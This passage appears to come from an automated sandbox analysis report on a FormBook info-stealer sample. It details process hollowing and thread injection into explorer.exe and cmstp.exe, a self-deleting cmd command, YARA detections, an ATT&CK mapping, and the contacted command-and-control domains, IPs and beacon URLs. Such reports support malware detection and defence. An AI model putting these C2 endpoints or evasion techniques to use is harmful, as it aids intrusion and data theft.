          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046452A5 mov eax, dword ptr fs:[00000030h]11_2_046452A5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046C46A7 mov eax, dword ptr fs:[00000030h]11_2_046C46A7
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]11_2_04710EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]11_2_04710EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04710EA5 mov eax, dword ptr fs:[00000030h]11_2_04710EA5
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]11_2_0465AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465AAB0 mov eax, dword ptr fs:[00000030h]11_2_0465AAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467FAB0 mov eax, dword ptr fs:[00000030h]11_2_0467FAB0
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_046DFE87 mov eax, dword ptr fs:[00000030h]11_2_046DFE87
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]11_2_0467D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0467D294 mov eax, dword ptr fs:[00000030h]11_2_0467D294
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464DB60 mov ecx, dword ptr fs:[00000030h]11_2_0464DB60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465FF60 mov eax, dword ptr fs:[00000030h]11_2_0465FF60
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718F6A mov eax, dword ptr fs:[00000030h]11_2_04718F6A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]11_2_04673B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04673B7A mov eax, dword ptr fs:[00000030h]11_2_04673B7A
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464DB40 mov eax, dword ptr fs:[00000030h]11_2_0464DB40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0465EF40 mov eax, dword ptr fs:[00000030h]11_2_0465EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04718B58 mov eax, dword ptr fs:[00000030h]11_2_04718B58
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_0464F358 mov eax, dword ptr fs:[00000030h]11_2_0464F358
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]11_2_04644F2E
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 11_2_04644F2E mov eax, dword ptr fs:[00000030h]11_2_04644F2E
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 1_2_00409B50 LdrLoadDll,1_2_00409B50
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_100057F4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_100057F4

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 104.248.163.187 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tankomixing.com
          Source: C:\Windows\explorer.exeDomain query: www.leads-mania.club
          Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.33 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.bezhantrading.com
          Source: C:\Windows\explorer.exeDomain query: www.americanvisionvinyl.com
          Source: C:\Windows\explorer.exeNetwork Connect: 46.38.243.234 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.iccsukltd.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.246.6.109 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.affiliatemarketingproducts.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 153.127.214.206 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 138.68.74.116 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.184.156 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.worryterrible.space
          Source: C:\Windows\explorer.exeDomain query: www.alles-abgedeckt.com
          Source: C:\Windows\explorer.exeDomain query: www.dempseynutrition.com
          Source: C:\Windows\explorer.exeDomain query: www.harada-insatsu.com
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection unmapped: C:\Windows\SysWOW64\cmstp.exe base address: D0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmstp.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeMemory written: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe base: 400000 value starts with: 4D5AJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeThread register set: target process: 3440Jump to behavior
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeProcess created: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe" Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exe"Jump to behavior
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000005.00000000.380351943.0000000000EE0000.00000002.00020000.sdmp, cmstp.exe, 0000000B.00000002.619338483.0000000002ED0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_10004343 cpuid 0_2_10004343
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_1000568B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_1000568B
          Source: C:\Users\user\Desktop\nowy przyk#U0142adowy katalog.exeCode function: 0_2_0040312A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040312A

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.nowy przyk#U0142adowy katalog.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.0.nowy przyk#U0142adowy katalog.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.426662087.0000000000CE0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.426692042.0000000000D10000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618855079.0000000002860000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.361409947.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.618002873.0000000000180000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.364413709.000000000E840000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.412735019.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.425753060.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.395866901.000000000F6E6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.358925915.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.619144149.0000000002960000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000000.360578387.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Application Shimming1Process Injection612Virtualization/Sandbox Evasion2Input Capture1System Time Discovery1Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsApplication Shimming1Process Injection612LSASS MemoryQuery Registry1Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerSecurity Software Discovery251SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSVirtualization/Sandbox Evasion2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing1LSA SecretsProcess Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonFile Deletion1Cached Domain CredentialsRemote System Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery2Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery114Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 515499 Sample: nowy przyk#U0142adowy katalog.exe Startdate: 04/11/2021 Architecture: WINDOWS Score: 100 32 www.sddn13.xyz 2->32 34 sddn13.xyz 2->34 52 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->52 54 Multi AV Scanner detection for domain / URL 2->54 56 Found malware configuration 2->56 58 9 other signatures 2->58 11 nowy przyk#U0142adowy katalog.exe 17 2->11         started        signatures3 process4 dnsIp5 42 192.168.2.1 unknown unknown 11->42 30 C:\Users\user\AppData\Local\...\rarelsbsy.dll, PE32 11->30 dropped 72 Injects a PE file into a foreign processes 11->72 16 nowy przyk#U0142adowy katalog.exe 11->16         started        file6 signatures7 process8 signatures9 44 Modifies the context of a thread in another process (thread injection) 16->44 46 Maps a DLL or memory area into another process 16->46 48 Sample uses process hollowing technique 16->48 50 Queues an APC in another process (thread injection) 16->50 19 explorer.exe 16->19 injected process10 dnsIp11 36 harada-insatsu.com 153.127.214.206, 49773, 80 SAKURA-ASAKURAInternetIncJP Japan 19->36 38 www.iccsukltd.com 217.160.0.33, 49770, 80 ONEANDONE-ASBrauerstrasse48DE Germany 19->38 40 17 other IPs or domains 19->40 60 System process connects to network (likely due to code injection or exploit) 19->60 62 Performs DNS queries to domains with low reputation 19->62 23 cmstp.exe 19->23         started        signatures12 process13 signatures14 64 Self deletion via cmd delete 23->64 66 Modifies the context of a thread in another process (thread injection) 23->66 68 Maps a DLL or memory area into another process 23->68 70 Tries to detect virtualization through RDTSC time measurements 23->70 26 cmd.exe 1 23->26         started        process15 process16 28 conhost.exe 26->28         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          nowy przyk#U0142adowy katalog.exe30%ReversingLabsWin32.Backdoor.Zapchast
          nowy przyk#U0142adowy katalog.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nss48B9.tmp\rarelsbsy.dll14%ReversingLabsWin32.Backdoor.Zapchast

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.5.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.1.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.4.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          11.2.cmstp.exe.4b5796c.4.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.3.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.1.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.2.unpack100%AviraTR/Patched.Ren.Gen2Download File
          1.0.nowy przyk#U0142adowy katalog.exe.400000.6.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.nowy przyk#U0142adowy katalog.exe.e840000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.0.nowy przyk#U0142adowy katalog.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          11.2.cmstp.exe.3bbc28.1.unpack100%AviraTR/Patched.Ren.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          harada-insatsu.com0%VirustotalBrowse
          bezhantrading.com6%VirustotalBrowse
          www.iccsukltd.com1%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          www.bezhantrading.com/wtcv/0%Avira URL Cloudsafe
          http://www.worryterrible.space/wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw==0%Avira URL Cloudsafe
          http://www.harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.tankomixing.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg==0%Avira URL Cloudsafe
          http://www.alles-abgedeckt.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA==0%Avira URL Cloudsafe
          http://www.americanvisionvinyl.com/wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH00%Avira URL Cloudsafe
          http://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          harada-insatsu.com
          		153.127.214.206
          		truetrueunknown
          bezhantrading.com
          		104.248.163.187
          		truetrueunknown
          www.iccsukltd.com
          		217.160.0.33
          		truetrueunknown
          td-balancer-euw2-6-109.wixdns.net
          		35.246.6.109
          		truefalse
            		unknown
            americanvisionvinyl.com
            		34.102.136.180
            		truefalse
              		unknown
              www.affiliatemarketingproducts.xyz
              		172.67.184.156
              		truetrue
                		unknown
                sddn13.xyz
                		50.118.182.205
                		truetrue
                  		unknown
                  worryterrible.space
                  		34.102.136.180
                  		truefalse
                    		unknown
                    www.alles-abgedeckt.com
                    		46.38.243.234
                    		truetrue
                      		unknown
                      leads-mania.club
                      		138.68.74.116
                      		truetrue
                        		unknown
                        www.tankomixing.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.sddn13.xyz
                          		unknown
                          		unknowntrue
                            		unknown
                            www.leads-mania.club
                            		unknown
                            		unknowntrue
                              		unknown
                              www.worryterrible.space
                              		unknown
                              		unknowntrue
                                		unknown
                                www.bezhantrading.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.americanvisionvinyl.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.dempseynutrition.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.harada-insatsu.com
                                      		unknown
                                      		unknowntrue
                                        		unknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.affiliatemarketingproducts.xyz/wtcv/?6lpD=n99BCbv8t7R76U7aWl+Y4jwhCBMXqFH3Ss3s1uofAFeCknYKTX6A2ZhN+sblY4y892kijutCfw==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.bezhantrading.com/wtcv/?6lpD=U8NG9FaSD2kxZB2OJ0E9golv5lIIWRC0uShqIwpBJZHTTqOYZoxmZrRB+XQzKwloE4eQBzh5Yg==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        www.bezhantrading.com/wtcv/true
                                        • Avira URL Cloud: safe
                                        		low
                                        http://www.worryterrible.space/wtcv/?g2ML=crBLeffhPhH0&6lpD=T+sBBhD+jNCXQwtHdmguBNleR0ygENBETJPwbdwO/+mZKIq0Z0gdUrlML9Z9p+t2mZBgFheVMw==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.harada-insatsu.com/wtcv/?6lpD=3PEHh71NGJ6azwdPIaKj9SJxQ5GIvylohbG4MidSx9GNzMWuTZ2Cml2qwvbSyEbxmGLLoGUQ/A==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tankomixing.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=ydnZOtJN4rL7t+2rr2QP2l64KaWWig+O10p3BIFftvtUQta9c9OEvE67gAwElgS+ahtVnBS/Rg==false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.alles-abgedeckt.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=7rFvx+oOkIknJeLSGT6zdpK11SNx3XmCJl3+oL6bUqBoSOO899RABoVcVaGdEbUjg6Jp245BoA==true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.americanvisionvinyl.com/wtcv/?6lpD=S1gCkNmaG9RWB/pKREaVLOJX/KdzA8KUzxvMSJydFpcLjSWhmPt8MQ7tAXeYu3xo2zwBelgJSg==&g2ML=crBLeffhPhH0false
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.leads-mania.club/wtcv/?6lpD=6uadF/xtp6SIEZXRejc5eEgqqida81Lycer078wuaqskBH7+Y9BHXTO8hpDHVP52SXbct0O1Gw==&g2ML=crBLeffhPhH0true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.iccsukltd.com/wtcv/?g2ML=crBLeffhPhH0&6lpD=avBZXYWwHS+0cE4x4OhaeduPUSE/+pj8feHEWqkpfSZeSdEeZDPav/r/n85naepg7UJMR8VNdw==true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000005.00000000.364768188.000000000095C000.00000004.00000020.sdmpfalse
                                          		high
                                          http://nsis.sf.net/NSIS_Errornowy przyk#U0142adowy katalog.exefalse
                                            		high
                                            http://nsis.sf.net/NSIS_ErrorErrornowy przyk#U0142adowy katalog.exefalse
                                              		high
                                              http://browsehappy.com/cmstp.exe, 0000000B.00000002.620985574.0000000004CD2000.00000004.00020000.sdmpfalse
                                                		high

                                                Contacted IPs

                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs

                                                Public

                                                IPDomainCountryFlagASNASN NameMalicious
                                                104.248.163.187
                                                		bezhantrading.comUnited States
                                                		14061DIGITALOCEAN-ASNUStrue
                                                35.246.6.109
                                                		td-balancer-euw2-6-109.wixdns.netUnited States
                                                		15169GOOGLEUSfalse
                                                153.127.214.206
                                                		harada-insatsu.comJapan7684SAKURA-ASAKURAInternetIncJPtrue
                                                138.68.74.116
                                                		leads-mania.clubUnited States
                                                		14061DIGITALOCEAN-ASNUStrue
                                                34.102.136.180
                                                		americanvisionvinyl.comUnited States
                                                		15169GOOGLEUSfalse
                                                172.67.184.156
                                                		www.affiliatemarketingproducts.xyzUnited States
                                                		13335CLOUDFLARENETUStrue
                                                217.160.0.33
                                                		www.iccsukltd.comGermany
                                                		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                46.38.243.234
                                                		www.alles-abgedeckt.comGermany
                                                		197540NETCUP-ASnetcupGmbHDEtrue

                                                Private

                                                IP
                                                192.168.2.1

                                                General Information

                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                Analysis ID:515499
                                                Start date:04.11.2021
                                                Start time:11:46:58
                                                Joe Sandbox Product:CloudBasic
                                                Overall analysis duration:0h 9m 34s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Sample file name:nowy przyk#U0142adowy katalog.exe
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                Number of analysed new started processes analysed:20
